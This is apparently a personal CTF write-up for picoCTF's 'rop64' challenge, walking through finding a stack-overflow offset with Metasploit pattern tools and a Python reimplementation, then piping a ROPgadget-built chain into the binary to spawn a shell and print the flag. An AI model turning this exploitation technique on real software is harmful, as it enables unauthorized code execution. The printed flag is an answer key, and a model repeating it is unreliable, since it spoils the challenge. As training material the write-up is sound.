ctftime

My solutions for various CTF challenges


rop64

Binary Exploitation - Points: 400

Time for the classic ROP in 64-bit. Can you exploit this program to get a flag?

Challenge files: vuln (binary), vuln.c (source)

Use ROPgadget to find a ROP chain that spawns a shell.

$ ROPgadget --binary vuln --ropchain

Find the offset at which the overflowing buffer overwrites the saved return address (RIP). Create a cyclic pattern, feed it to the program under gdb, and read the pattern value that ends up in the return address when the SEGFAULT occurs; the pattern_offset tool maps that value back to its position in the pattern.

$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x6241396141386141
  [*] Exact match at offset 24
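To double-check the reported offset without the Metasploit scripts, here is an added Python reimplementation of the cyclic-pattern lookup (it is not part of the original writeup or of Metasploit); the crash value 0x6241396141386141 and the 1024-byte pattern length come from the commands above, and the function names are this example's own.

```python
import itertools
import string
import struct


def msf_pattern(length):
    """Build the Metasploit-style cyclic pattern that pattern_create.rb emits:
    successive 3-byte triplets of (uppercase, lowercase, digit), e.g. Aa0Aa1Aa2...
    Any 4-byte or longer window is unique within the first 20280 bytes."""
    triplets = (
        upper + lower + digit
        for upper in string.ascii_uppercase
        for lower in string.ascii_lowercase
        for digit in string.digits
    )
    return "".join(itertools.islice(triplets, length // 3 + 1))[:length]


def _needle(crash_value, width):
    # The register holds the bytes little-endian, so pack them back in that
    # order to recover the text that sat at that stack slot.
    fmt = "<Q" if width == 8 else "<I"
    return struct.pack(fmt, crash_value).decode("ascii", errors="replace")


def pattern_offset(crash_value, width=8, length=1024):
    """Same computation as pattern_offset.rb -q: position of the crash value
    inside the pattern, or -1 if the value did not come from the pattern."""
    return msf_pattern(length).find(_needle(crash_value, width))


def is_unambiguous(crash_value, width=8, length=1024):
    """True when the crash value occurs exactly once in the pattern, so the
    offset cannot be confused with a second position (a check worth making
    for short 4-byte values on 32-bit targets)."""
    return msf_pattern(length).count(_needle(crash_value, width)) == 1


if __name__ == "__main__":
    crash = 0x6241396141386141  # value read from the faulting return address
    print("bytes at crash:", _needle(crash, 8))        # Aa8Aa9Ab
    print("offset:", pattern_offset(crash))            # 24
    print("unambiguous:", is_unambiguous(crash))       # True
```

An offset of 24 means the first 24 bytes fill the buffer and saved frame data, and bytes 24 through 31 land on the saved return address.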

Send the ROP chain produced by ROPgadget, prefixed with 24 bytes of padding, to get a shell and cat flag.txt. The trailing cat in the command below keeps stdin open after the script finishes, so the spawned shell can still read commands.

$ (python2 sol.py; cat) | ./vuln

flag: picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}